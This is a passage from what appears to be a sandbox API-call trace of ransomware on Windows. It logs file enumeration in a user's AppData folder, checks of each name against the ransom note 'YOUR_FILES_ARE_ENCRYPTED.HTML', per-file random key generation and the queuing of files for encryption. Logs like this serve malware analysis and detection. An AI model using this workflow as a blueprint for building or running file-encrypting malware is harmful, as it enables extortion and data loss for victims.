param_1=0x4ebdab2, param_2="%02X" | out: param_1="3A") returned 2 [0165.711] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png" [0165.711] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.711] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0165.739] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42960a20, ftCreationTime.dwHighDateTime=0x1d7e778, ftLastAccessTime.dwLowDateTime=0xf4762c00, ftLastAccessTime.dwHighDateTime=0x1d7e789, ftLastWriteTime.dwLowDateTime=0xf4762c00, ftLastWriteTime.dwHighDateTime=0x1d7e789, nFileSizeHigh=0x0, nFileSizeLow=0x107b5, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Ro81j5KYV.docx", cAlternateFileName="RO81J5~1.DOC")) returned 1 [0165.739] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx") returned 54 [0165.739] lstrcmpW (lpString1="Ro81j5KYV.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.739] PathFindExtensionW (pszPath="Ro81j5KYV.docx") returned=".docx" [0165.739] lstrlenW (lpString=".docx") returned 5 [0165.739] PathFindExtensionW (pszPath="Ro81j5KYV.docx") returned=".docx" [0165.739] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\ro81j5kyv.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0165.740] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=67509) returned 1 [0165.740] GetProcessHeap () returned 0x270000 [0165.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0165.744] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="04") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="92") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="8C") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="5A") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="CB") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="A0") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="0C") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C2") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="AD") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="C6") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="1D") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="C7") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="6F") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="E3") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="A4") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="7B") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="E5") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="E8") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="4D") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="CE") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="C0") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="BF") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="17") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="75") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="93") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="72") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="11") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="F8") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D0") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="B6") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="B3") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="0C") returned 2 [0165.746] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx" [0165.746] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.746] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0165.747] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20ddf0a0, ftCreationTime.dwHighDateTime=0x1d7de68, ftLastAccessTime.dwLowDateTime=0x6d8163b0, ftLastAccessTime.dwHighDateTime=0x1d7df21, ftLastWriteTime.dwLowDateTime=0x6d8163b0, ftLastWriteTime.dwHighDateTime=0x1d7df21, nFileSizeHigh=0x0, nFileSizeLow=0x253a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="s1X1py5zOF.pptx", cAlternateFileName="S1X1PY~1.PPT")) returned 1 [0165.747] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx") returned 55 [0165.747] lstrcmpW (lpString1="s1X1py5zOF.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.747] PathFindExtensionW (pszPath="s1X1py5zOF.pptx") returned=".pptx" [0165.747] lstrlenW (lpString=".pptx") returned 5 [0165.747] PathFindExtensionW (pszPath="s1X1py5zOF.pptx") returned=".pptx" [0165.747] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\s1x1py5zof.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0165.748] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=9530) returned 1 [0165.748] GetProcessHeap () returned 0x270000 [0165.748] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0165.748] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="9F") returned 2 [0165.748] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="AE") returned 2 [0165.748] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="2E") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="AD") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="CC") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D8") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="68") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="98") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B2") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="68") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="78") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="8B") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="EF") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="E1") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="33") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="68") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="01") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="9D") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="1F") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="6D") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="A9") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="DA") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="63") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="D7") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="3A") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="DF") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="6A") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="D9") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="C4") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A2") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="CF") returned 2 [0165.750] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="16") returned 2 [0165.750] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx" [0165.750] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.750] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0165.763] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2048c310, ftCreationTime.dwHighDateTime=0x1d7e0b9, ftLastAccessTime.dwLowDateTime=0x682bf4a0, ftLastAccessTime.dwHighDateTime=0x1d7e293, ftLastWriteTime.dwLowDateTime=0x682bf4a0, ftLastWriteTime.dwHighDateTime=0x1d7e293, nFileSizeHigh=0x0, nFileSizeLow=0xada7, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="UO5iMAxdE5LXqP1Rk D1.gif", cAlternateFileName="UO5IMA~1.GIF")) returned 1 [0165.763] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif") returned 64 [0165.763] lstrcmpW (lpString1="UO5iMAxdE5LXqP1Rk D1.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.763] PathFindExtensionW (pszPath="UO5iMAxdE5LXqP1Rk D1.gif") returned=".gif" [0165.763] lstrlenW (lpString=".gif") returned 4 [0165.763] PathFindExtensionW (pszPath="UO5iMAxdE5LXqP1Rk D1.gif") returned=".gif" [0165.763] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\uo5imaxde5lxqp1rk d1.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0165.764] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=44455) returned 1 [0165.764] GetProcessHeap () returned 0x270000 [0165.764] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0165.765] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="8A") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="50") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="E0") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="24") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="10") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="1A") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="76") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C7") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="89") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="2D") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="4F") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="59") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="86") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="22") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="B6") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="E1") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="B9") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="A1") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="BF") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="BD") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="7C") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="E5") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="11") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="E4") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="EC") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="33") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="4E") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="F1") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="14") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A5") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="10") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="13") returned 2 [0165.767] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif" [0165.767] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.767] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0165.772] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d7cdc50, ftCreationTime.dwHighDateTime=0x1d7e1a5, ftLastAccessTime.dwLowDateTime=0x716b8690, ftLastAccessTime.dwHighDateTime=0x1d7e76e, ftLastWriteTime.dwLowDateTime=0x716b8690, ftLastWriteTime.dwHighDateTime=0x1d7e76e, nFileSizeHigh=0x0, nFileSizeLow=0x126a4, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="xxYtajbRq352mO37KBk.bmp", cAlternateFileName="XXYTAJ~1.BMP")) returned 1 [0165.772] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\xxYtajbRq352mO37KBk.bmp") returned 63 [0165.772] lstrcmpW (lpString1="xxYtajbRq352mO37KBk.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.772] PathFindExtensionW (pszPath="xxYtajbRq352mO37KBk.bmp") returned=".bmp" [0165.772] lstrlenW (lpString=".bmp") returned 4 [0165.772] PathFindExtensionW (pszPath="xxYtajbRq352mO37KBk.bmp") returned=".bmp" [0165.772] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5d6844b0, ftCreationTime.dwHighDateTime=0x1d7da8c, ftLastAccessTime.dwLowDateTime=0x40c68b90, ftLastAccessTime.dwHighDateTime=0x1d7e078, ftLastWriteTime.dwLowDateTime=0x40c68b90, ftLastWriteTime.dwHighDateTime=0x1d7e078, nFileSizeHigh=0x0, nFileSizeLow=0x1341a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ZTc_iLMq.mp4", cAlternateFileName="")) returned 1 [0165.772] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4") returned 52 [0165.772] lstrcmpW (lpString1="ZTc_iLMq.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0165.772] PathFindExtensionW (pszPath="ZTc_iLMq.mp4") returned=".mp4" [0165.773] lstrlenW (lpString=".mp4") returned 4 [0165.773] PathFindExtensionW (pszPath="ZTc_iLMq.mp4") returned=".mp4" [0165.773] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.773] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\ztc_ilmq.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0165.773] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=78874) returned 1 [0165.773] GetProcessHeap () returned 0x270000 [0165.773] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0165.778] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="0C") returned 2 [0165.778] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A4") returned 2 [0165.778] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="A6") returned 2 [0165.778] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="40") returned 2 [0165.778] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="05") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="1E") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="54") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="24") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="12") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="05") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="14") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="70") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="AE") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="0E") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="ED") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="32") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="47") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="6B") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FC") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="7D") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="32") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="AE") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="24") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="3C") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="3D") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="B2") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="C3") returned 2 [0165.780] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="7D") returned 2 [0165.780] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="E9") returned 2 [0165.780] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="C0") returned 2 [0165.780] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="C4") returned 2 [0165.780] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="3A") returned 2 [0165.780] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4" [0165.780] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.781] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0165.782] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4aec10, ftCreationTime.dwHighDateTime=0x1d7db5e, ftLastAccessTime.dwLowDateTime=0xac8d1470, ftLastAccessTime.dwHighDateTime=0x1d7e717, ftLastWriteTime.dwLowDateTime=0xac8d1470, ftLastWriteTime.dwHighDateTime=0x1d7e717, nFileSizeHigh=0x0, nFileSizeLow=0x1292e, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ZUHdN4Zd.m4a", cAlternateFileName="")) returned 1 [0165.782] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a") returned 52 [0165.782] lstrcmpW (lpString1="ZUHdN4Zd.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0165.782] PathFindExtensionW (pszPath="ZUHdN4Zd.m4a") returned=".m4a" [0165.782] lstrlenW (lpString=".m4a") returned 4 [0165.782] PathFindExtensionW (pszPath="ZUHdN4Zd.m4a") returned=".m4a" [0165.782] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\zuhdn4zd.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0165.783] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=76078) returned 1 [0165.783] GetProcessHeap () returned 0x270000 [0165.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0165.789] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="C4") returned 2 [0165.789] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="E7") returned 2 [0165.789] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="51") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="80") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="B7") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="20") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="1C") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="50") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="EF") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A4") returned 2 [0165.790] wsprintfW (in: 